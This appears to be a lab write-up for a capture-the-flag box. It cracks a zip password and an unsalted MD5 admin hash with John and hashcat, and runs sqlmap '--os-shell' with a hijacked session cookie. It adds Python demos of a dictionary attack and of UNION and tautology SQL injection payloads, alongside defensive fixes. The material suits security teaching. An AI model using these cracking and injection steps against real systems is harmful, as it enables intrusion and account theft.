Intro
| Difficulty | OS | Start Date | End Date |
|---|---|---|---|
| Very Easy | Linux | 11/06/2022 | 12/06/2022 |
Process
- Log in as `anonymous` on the FTP service, `get` the .zip and try to `unzip` it (it is password protected).
- Use John the Ripper to recover the zip password, then unzip the archive.
John The Ripper
John ships a helper script called zip2john that turns the zip file into a hash that John understands. We then run a wordlist against that hash to brute force the archive password.
Get the hash

```bash
$ zip2john backup.zip > hash.txt
```

Brute force the hash

```bash
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Show the password

```bash
$ john --show hash.txt
```

On Kali the wordlist ships compressed, so you must first run `gunzip /usr/share/wordlists/rockyou.txt.gz`.
MD5 Password
Inside index.php there was the admin's password stored as an unsalted MD5 hash (hashed, not encrypted, so it cannot be reversed but it can be cracked with a wordlist). To crack the MD5 hash, put it in a file and run hashcat in mode 0 (raw MD5):

```bash
$ sudo hashcat -m 0 pass.md5 /usr/share/wordlists/rockyou.txt
```

hashcat prints the `hash:password` pair when it finds a match; it also caches the result in its potfile, so `hashcat -m 0 pass.md5 --show` prints it again later.
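Both the John step (zip2john + rockyou.txt) and the hashcat step above are the same dictionary attack: hash each candidate word and compare it with the target. The script below, added here as an illustration and not part of the original write-up or of the John/hashcat projects, implements that loop for raw MD5 with a small constructed wordlist in place of rockyou.txt and a simple mangling step similar in spirit to the rule engines both tools provide. The wordlist contents, the `mangled` rules and the `load_wordlist` helper are assumptions for the example.

```python
import hashlib
from typing import Callable, Iterable, Iterator, Optional

# Constructed sample wordlist standing in for rockyou.txt (assumption for
# this example; the real file has ~14 million entries).
SAMPLE_WORDLIST = [
    "123456", "password", "letmein", "qwerty", "hunter2", "summer2022",
]


def md5_hex(candidate: str) -> str:
    """Raw MD5 of the candidate, lowercase hex, as hashcat -m 0 expects."""
    return hashlib.md5(candidate.encode("utf-8", "surrogateescape")).hexdigest()


def load_wordlist(path: str) -> Iterator[str]:
    """Yield words from a wordlist file one at a time.

    rockyou.txt contains bytes that are not valid UTF-8, so it is opened as
    latin-1 to avoid decode errors part-way through the file.
    """
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def mangled(words: Iterable[str]) -> Iterator[str]:
    """Cheap rule set (assumption): each word as-is, capitalised, and with
    common suffixes, the kind of variation john/hashcat rules generate."""
    suffixes = ("1", "!", "123", "2022")
    for word in words:
        yield word
        cap = word.capitalize()
        if cap != word:
            yield cap
        for suffix in suffixes:
            yield word + suffix
            yield cap + suffix


def dictionary_attack(target: str, words: Iterable[str],
                      hash_fn: Callable[[str], str] = md5_hex) -> Optional[str]:
    """Return the first candidate whose hash equals target, or None."""
    target = target.strip().lower()
    for word in words:
        if hash_fn(word) == target:
            return word
    return None


def crack_hash_file(lines: Iterable[str], words: list) -> dict:
    """Mirror of `hashcat -m 0 pass.md5 wordlist`: one result per hash line.

    `words` must be a list (not a generator) because it is iterated once per
    hash; for a real wordlist, hash the targets into a set and stream the
    words once instead.
    """
    results = {}
    for line in lines:
        target = line.strip()
        if not target:
            continue
        results[target] = dictionary_attack(target, words)
    return results


if __name__ == "__main__":
    # Constructed input: the MD5 of a word that is in the sample list.
    target = md5_hex("hunter2")
    print(target, "->", dictionary_attack(target, SAMPLE_WORDLIST))
    # A mangled variant is only found once the rules are applied.
    target = md5_hex("Summer2022!")
    print(target, "->", dictionary_attack(target, SAMPLE_WORDLIST))
    print(target, "->", dictionary_attack(target, mangled(SAMPLE_WORDLIST)))
```

The takeaway for the defender is the same thing that makes this attack work: an unsalted, fast hash such as MD5 lets an attacker test millions of candidates per second offline, so a web application should store passwords with a slow, salted scheme (bcrypt, scrypt or Argon2) and never ship a hash in a source file such as index.php.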
SQL Injection
The website has a search bar that is vulnerable to SQL injection. We can use sqlmap, but the search page sits behind the login, so before running any command we need to grab the session cookie of the authenticated admin user (a browser extension such as Cookie-Editor makes this easy) and pass it to sqlmap:

```bash
$ sqlmap -u "http://10.129.95.174/dashboard.php?search=hello" --cookie="PHPSESSID=rp7ki2fucgrc0brl7f1l9j5p9e" --os-shell
```

`--os-shell` only works when the backend DBMS can run operating-system commands (for PostgreSQL sqlmap abuses `COPY ... TO PROGRAM`, which needs a superuser database account); the commands then run as the OS user the database runs as, not as www-data.
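sqlmap automates what is shown below: it injects into the `search` parameter, compares responses for true and false conditions to confirm the injection, and then uses UNION or stacked queries to read data or reach the OS. The snippet is an added example, not code from the original write-up, from sqlmap, or from the target's index.php/dashboard.php; it uses an in-memory SQLite database with a constructed `cars` and `users` schema (an assumption, chosen only so the example runs offline) to contrast the string-concatenated query a vulnerable PHP search handler would build with the parameterised version that fixes it.

```python
import hashlib
import sqlite3
from typing import Callable, List, Tuple

# Constructed sample data (assumption): an admin row with an MD5 password,
# like the one the write-up found in index.php, and a table the search box queries.
ADMIN_HASH = hashlib.md5(b"hunter2").hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE cars(id INTEGER PRIMARY KEY, name TEXT, type TEXT);
    """)
    conn.execute("INSERT INTO users(username, password) VALUES (?, ?)",
                 ("admin", ADMIN_HASH))
    conn.executemany("INSERT INTO cars(name, type) VALUES (?, ?)",
                     [("Elixir", "Sports"), ("Sandy", "Sedan"), ("Meteor", "Hatchback")])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """The bug: the search term is spliced into the SQL text, so quotes in
    `term` end the string literal and the rest is executed as SQL."""
    sql = f"SELECT name, type FROM cars WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """The fix: a bound parameter is always treated as data, never as SQL."""
    sql = "SELECT name, type FROM cars WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def is_injectable(conn: sqlite3.Connection,
                  search: Callable[[sqlite3.Connection, str], list]) -> bool:
    """Boolean-based check in the style sqlmap uses: if appending a true
    condition and a false condition to a known-good term gives different
    results, the condition is being evaluated as SQL."""
    base = "Sandy"
    true_case = search(conn, f"{base}' AND 1=1--")
    false_case = search(conn, f"{base}' AND 1=2--")
    return true_case != false_case


def dump_users_via_union(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """UNION injection: the payload must select the same number of columns
    (two here) as the original query so the rows are appended to the result."""
    payload = "x' UNION SELECT username, password FROM users--"
    return search_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler injectable:", is_injectable(db, search_vulnerable))
    print("safe handler injectable:     ", is_injectable(db, search_safe))
    print("tautology returns all rows:  ", search_vulnerable(db, "x' OR 1=1--"))
    print("UNION dumps users table:     ", dump_users_via_union(db))
    print("same payload, safe handler:  ", search_safe(db, "x' OR 1=1--"))
```

The trailing `--` comments out the `%'` the application appends after the injected text, which is why the payloads end with it. Python's `sqlite3` refuses stacked statements in `execute()`, so the `;`-separated payloads sqlmap uses for `--os-shell` on PostgreSQL cannot be reproduced in this example; the detection and UNION steps are the same on any SQL backend.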
The user flag is in /var/lib/postgresql/, the home directory of the postgres system user (the account the database, and therefore the sqlmap shell, runs as).
I found the user flag but I got lost in the process of creating an interactive shell.
I only need the root flag.